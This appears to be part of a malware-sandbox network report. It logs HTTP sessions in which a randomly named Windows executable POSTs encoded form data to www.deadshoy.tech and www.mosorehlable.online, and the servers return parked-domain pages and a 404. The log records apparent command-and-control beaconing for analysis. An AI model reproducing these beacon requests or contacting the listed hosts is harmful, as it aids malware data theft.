                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 4f 43 74 37 4a 77 78 43 54 78 78 5a 64 34 52 62 6a 4f 70 42 6d 6d 79 4b 4d 6f 31 46 65 4f 41 76 56 53 38 34 34 6f 65 57 77 4a 38 4b 6b 57 70 63 4a 79 5a 58 69 5a 57 6a 76 2f 2b 2f 41 53 2b 49 34 6a 6c 47 5a 33 45 55 44 37 30 37 76 68 6c 7a 52 6b 69 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                          Jan 8, 2025 15:00:41.857562065 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjYwMDU5NzQtYzRkZS00NDMzLWFkMzEtZDNjMDdmODU2ZWJmIiwicGFnZV90aW1lIjoxNzM2MzQ0OD


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.649990199.59.243.228802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:43.939471960 CET793OUTPOST /m5bf/ HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.deadshoy.tech
                                                                                          Referer: http://www.deadshoy.tech/m5bf/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 49 49 7a 38 77 74 76 73 79 38 73 51 41 41 77 78 6b 79 7a 37 51 44 51 45 66 59 6b 73 2b 4a 34 76 6f 49 39 77 6c 5a 6a 6d 71 76 45 5a 36 4d 69 6e 58 53 79 55 77 69 62 6b 65 74 51 78 38 56 63 6f 75 76 76 50 4e 32 6a 58 30 67 53 30 6d 55 73 77 72 44 69 75 47 2f 51 44 58 4b 50 71 50 6d 4e 79 71 63 34 36 56 58 4f 31 44 75 68 74 7a 4d 79 37 4f 36 74 54 5a 49 57 71 4f 32 32 35 67 59 67 69 75 66 70 38 44 77 74 34 39 43 6a 35 4f 69 46 58 4d 42 4d 36 39 45 42 66 31 4e 6e 35 2b 70 53 71 74 65 4c 54 6b 36 79 5a 47 46 36 5a 69 34 34 31 57 66 75 6d 5a 63 58 62 36 71 50 69 78 52 4a 74 50 55 63 7a 35 4c 69 5a 2f 59 55 79 34 51 62 6c 73 7a 56 31 47 75 44 52 67 45 63 34 44 7a 76 54 6f 77 3d 3d
                                                                                          Data Ascii: T4OdNH=IIz8wtvsy8sQAAwxkyz7QDQEfYks+J4voI9wlZjmqvEZ6MinXSyUwibketQx8VcouvvPN2jX0gS0mUswrDiuG/QDXKPqPmNyqc46VXO1DuhtzMy7O6tTZIWqO225gYgiufp8Dwt49Cj5OiFXMBM69EBf1Nn5+pSqteLTk6yZGF6Zi441WfumZcXb6qPixRJtPUcz5LiZ/YUy4QblszV1GuDRgEc4DzvTow==
                                                                                          Jan 8, 2025 15:00:44.388211012 CET1236INHTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:43 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1118
                                                                                          x-request-id: 44af6101-67c6-49b2-bccb-0868e94dfbf4
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==
                                                                                          set-cookie: parking_session=44af6101-67c6-49b2-bccb-0868e94dfbf4; expires=Wed, 08 Jan 2025 14:15:44 GMT; path=/
                                                                                          connection: close
                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 4f 43 74 37 4a 77 78 43 54 78 78 5a 64 34 52 62 6a 4f 70 42 6d 6d 79 4b 4d 6f 31 46 65 4f 41 76 56 53 38 34 34 6f 65 57 77 4a 38 4b 6b 57 70 63 4a 79 5a 58 69 5a 57 6a 76 2f 2b 2f 41 53 2b 49 34 6a 6c 47 5a 33 45 55 44 37 30 37 76 68 6c 7a 52 6b 69 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                          Jan 8, 2025 15:00:44.388228893 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDRhZjYxMDEtNjdjNi00OWIyLWJjY2ItMDg2OGU5NGRmYmY0IiwicGFnZV90aW1lIjoxNzM2MzQ0OD


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.649991199.59.243.228802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:46.489474058 CET1806OUTPOST /m5bf/ HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.deadshoy.tech
                                                                                          Referer: http://www.deadshoy.tech/m5bf/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 49 49 7a 38 77 74 76 73 79 38 73 51 41 41 77 78 6b 79 7a 37 51 44 51 45 66 59 6b 73 2b 4a 34 76 6f 49 39 77 6c 5a 6a 6d 71 76 4d 5a 36 2f 71 6e 56 30 36 55 78 69 62 6b 43 39 51 6c 38 56 63 35 75 76 33 44 4e 33 66 74 30 6d 65 30 30 69 34 77 74 33 32 75 4d 2f 51 44 49 36 50 76 51 32 4d 79 71 63 6f 2b 56 58 2b 31 44 75 68 74 7a 50 71 37 59 62 74 54 62 49 57 74 59 6d 32 31 72 34 68 73 75 62 46 47 44 77 67 46 2b 78 72 35 50 45 6c 58 41 53 6b 36 69 30 42 64 30 4e 6e 78 2b 70 75 31 74 65 47 73 6b 36 47 7a 47 47 6d 5a 6d 63 39 4c 53 66 32 37 4e 73 58 35 71 4a 50 42 78 52 56 37 43 58 67 72 7a 37 69 61 33 4a 6f 51 33 6b 54 35 34 7a 74 74 45 74 50 74 76 78 45 6f 48 48 36 34 71 4b 6b 47 36 48 4a 67 48 32 78 6f 7a 6c 53 50 49 4d 69 38 50 4a 76 42 6f 61 2b 36 77 4d 35 6f 46 67 66 4c 78 4c 4d 48 38 6b 35 4f 68 73 39 77 43 50 53 46 4d 59 70 58 65 58 6c 2b 34 68 65 73 72 57 4c 6a 48 77 6e 75 34 41 41 50 37 75 59 77 4e 7a 77 72 50 65 78 7a 7a 79 78 71 49 69 53 57 55 6e 71 4a 62 5a 47 42 32 30 41 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=IIz8wtvsy8sQAAwxkyz7QDQEfYks+J4voI9wlZjmqvMZ6/qnV06UxibkC9Ql8Vc5uv3DN3ft0me00i4wt32uM/QDI6PvQ2Myqco+VX+1DuhtzPq7YbtTbIWtYm21r4hsubFGDwgF+xr5PElXASk6i0Bd0Nnx+pu1teGsk6GzGGmZmc9LSf27NsX5qJPBxRV7CXgrz7ia3JoQ3kT54zttEtPtvxEoHH64qKkG6HJgH2xozlSPIMi8PJvBoa+6wM5oFgfLxLMH8k5Ohs9wCPSFMYpXeXl+4hesrWLjHwnu4AAP7uYwNzwrPexzzyxqIiSWUnqJbZGB20AeuiFOgeWNi3y4VdrTdMqT9IeVrX4+b3x6aACDIM9abaghSKNGQLay3hcZKHkaFgly/Q2mSnJ/HBhKoEbKpp3KyzIcqF3EbD5m5mx/+V4ND0NjyrWgMPxLb1YG0O1v1dH5HHL7KOdsVbUTkLlZ5MywfkqkFkpKlYI3hQqfCwXDF4eAGv3BitFFIqctwfWEcQlQcjkPsgVvTDwQPYdQQf2/f18l6+TJtadkVwhSAU8Yox4sDr+rG9CiDds6uyHteLo0SOMc8YUUfxE4qnXUy0k65bhbDgMwZ4keLgAr0cGUuQNThZm6jmpiM6mZNwEm74syW9o3Ap6lKeeDwjnuujCJIoNDclK4DisoTRRdxVRcxHDPxfWvKvgFD705gWTMZubu2fOB81MC73FH3X1fgUb5tCmcXRyEiMmU6xw8+i24pewwjXNxFkMwHm1654XmnmcKUn+/fxtCC0qv/ewy8qH213qx8tTS1rybQifc1Hyao9TWuwx/FBzpRhvhfF5JZwl5uuNe2/PAk05B3QHeRadyYd/dFKSMgBE6oXMjZaTaK3p9pP9+195u2rRRR3R5NA+0k2ARCeuhwSEnOxgKvcWeQEm2GTRCryaNrT0aH89PWwKel8UPwTHgD/9VAzE87vZEh6hFytsoRjfp3RwvQk4ZU7Sa1l5eEaGf/ [TRUNCATED]
                                                                                          Jan 8, 2025 15:00:46.931845903 CET1236INHTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:46 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1118
                                                                                          x-request-id: 9aa92100-839c-46f0-9ca4-07e70b4d53c6
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==
                                                                                          set-cookie: parking_session=9aa92100-839c-46f0-9ca4-07e70b4d53c6; expires=Wed, 08 Jan 2025 14:15:46 GMT; path=/
                                                                                          connection: close
                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 4f 43 74 37 4a 77 78 43 54 78 78 5a 64 34 52 62 6a 4f 70 42 6d 6d 79 4b 4d 6f 31 46 65 4f 41 76 56 53 38 34 34 6f 65 57 77 4a 38 4b 6b 57 70 63 4a 79 5a 58 69 5a 57 6a 76 2f 2b 2f 41 53 2b 49 34 6a 6c 47 5a 33 45 55 44 37 30 37 76 68 6c 7a 52 6b 69 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LOCt7JwxCTxxZd4RbjOpBmmyKMo1FeOAvVS844oeWwJ8KkWpcJyZXiZWjv/+/AS+I4jlGZ3EUD707vhlzRkiqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                          Jan 8, 2025 15:00:46.931864023 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWFhOTIxMDAtODM5Yy00NmYwLTljYTQtMDdlNzBiNGQ1M2M2IiwicGFnZV90aW1lIjoxNzM2MzQ0OD


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.649992199.59.243.228802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:49.029521942 CET514OUTGET /m5bf/?T4OdNH=FKbczbLQ0sosfCA1qCrPSRQ7VsQywqY/pLAdnJ/+09co5PW+cyiO7Vblbf5B8jAN4N3DOHH6+lmh0DtSmFnRLbtcPKmyFQ0Njr8nYR2PceIb1tebNbsHFqS/Z3HN1OVssaooHgA=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.deadshoy.tech
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:49.481997013 CET1236INHTTP/1.1 200 OK
                                                                                          date: Wed, 08 Jan 2025 14:00:49 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-length: 1518
                                                                                          x-request-id: fb7c4325-a793-4422-8f0a-4ca58a3e1276
                                                                                          cache-control: no-store, max-age=0
                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GKzPqV3Jhx4QzVCgNT3YpMNmC9vuBKbd4eQsrLtqONbfiIOM6FauXKA5n+n7RcElahZizuDELu6Yk+ABa2vV7g==
                                                                                          set-cookie: parking_session=fb7c4325-a793-4422-8f0a-4ca58a3e1276; expires=Wed, 08 Jan 2025 14:15:49 GMT; path=/
                                                                                          connection: close
                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 4b 7a 50 71 56 33 4a 68 78 34 51 7a 56 43 67 4e 54 33 59 70 4d 4e 6d 43 39 76 75 42 4b 62 64 34 65 51 73 72 4c 74 71 4f 4e 62 66 69 49 4f 4d 36 46 61 75 58 4b 41 35 6e 2b 6e 37 52 63 45 6c 61 68 5a 69 7a 75 44 45 4c 75 36 59 6b 2b 41 42 61 32 76 56 37 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GKzPqV3Jhx4QzVCgNT3YpMNmC9vuBKbd4eQsrLtqONbfiIOM6FauXKA5n+n7RcElahZizuDELu6Yk+ABa2vV7g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                          Jan 8, 2025 15:00:49.482013941 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmI3YzQzMjUtYTc5My00NDIyLThmMGEtNGNhNThhM2UxMjc2IiwicGFnZV90aW1lIjoxNzM2MzQ0OD


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.649993194.58.112.174802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:02.899338961 CET787OUTPOST /9bhq/ HTTP/1.1
                                                                                          Host: www.mosorehlable.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.mosorehlable.online
                                                                                          Referer: http://www.mosorehlable.online/9bhq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 4a 33 69 32 4d 46 57 79 46 37 37 55 5a 34 50 52 4f 52 69 75 6d 67 42 69 4d 36 79 38 65 45 4e 37 4e 64 6f 59 61 7a 50 62 48 45 66 68 56 32 46 54 37 66 5a 41 59 34 34 4c 67 37 4a 30 43 45 4b 56 45 61 4c 6f 4a 63 55 48 4f 75 53 32 70 53 51 4d 31 31 5a 48 6f 6a 32 64 7a 54 72 67 4e 47 64 76 63 4c 4b 39 75 58 2f 45 6c 63 50 52 4d 6d 74 58 4b 52 4e 30 4d 36 44 43 4d 45 32 68 5a 4d 58 7a 78 54 30 38 54 66 53 43 75 30 41 33 4a 31 34 45 41 78 64 4e 2b 42 51 68 2b 42 2f 64 49 37 74 53 39 58 65 55 44 51 6e 59 59 6c 76 39 64 6b 62 6a 61 32 74 46 34 77 53 4b 66 52 62 71 68 4a 34 4f 57 44 55 4e 69 67 79 6c 45 30 34 4f
                                                                                          Data Ascii: T4OdNH=J3i2MFWyF77UZ4PRORiumgBiM6y8eEN7NdoYazPbHEfhV2FT7fZAY44Lg7J0CEKVEaLoJcUHOuS2pSQM11ZHoj2dzTrgNGdvcLK9uX/ElcPRMmtXKRN0M6DCME2hZMXzxT08TfSCu0A3J14EAxdN+BQh+B/dI7tS9XeUDQnYYlv9dkbja2tF4wSKfRbqhJ4OWDUNigylE04O
                                                                                          Jan 8, 2025 15:01:03.479429007 CET1236INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:01:03 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 64 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a eb 6f db d6 15 ff 9e bf e2 46 03 2c 29 11 c9 ba 1d 8a 24 96 e4 b5 4d f7 a9 8f 01 4e 37 0c ae 2b 5c 51 57 12 23 8a d4 48 ca 8e 92 18 68 93 76 6d d1 a0 c1 ba 02 03 8a 15 7b 61 d8 a7 01 ce c3 ab 9b 87 fb 2f 90 ff d1 7e e7 5c 92 a2 64 49 79 34 1d 66 c0 b6 74 79 ef b9 e7 f9 3b e7 dc cb fa e9 8e 6f 47 93 91 12 fd 68 e8 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 47 91 b3 ab 4a c2 95 5e af 51 0a c6 25 cc 51 b2 d3 ac 0f 55 24 85 dd 97 41 a8 a2 46 e9 bd 4b bf 34 ce e1 19 8f 7a 72 a8 1a a5 91 0c 06 8e d7 2b 09 db f7 22 e5 61 52 a0 7a c1 d8 08 40 73 76 e6 ae a3 f6 46 7e 10 15 a6 ee 39 9d a8 df e8 a8 5d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 0e 12 91 13 b9 aa b9 b7 b7 67 0e fd d0 0f 54 df 95 6d 57 99 be e7 3a 9e aa 5b fa 71 1d 5f 06 22 50 6e a3 14 46 13 57 85 7d a5 b0 d3 50 75 1c d9 28 49 d7 2d 89 7e a0 ba 39 bf cc 9f 21 c7 91 6f da 61 88 5d a6 eb 1d 48 92 cd ee 4a b0 e6 7b 26 fe 6c ae 97 04 a9 10 1a 1b ca 9e b2 ae 18 3c b1 59 0f ed c0 19 45 4d eb 4c fd [TRUNCATED]
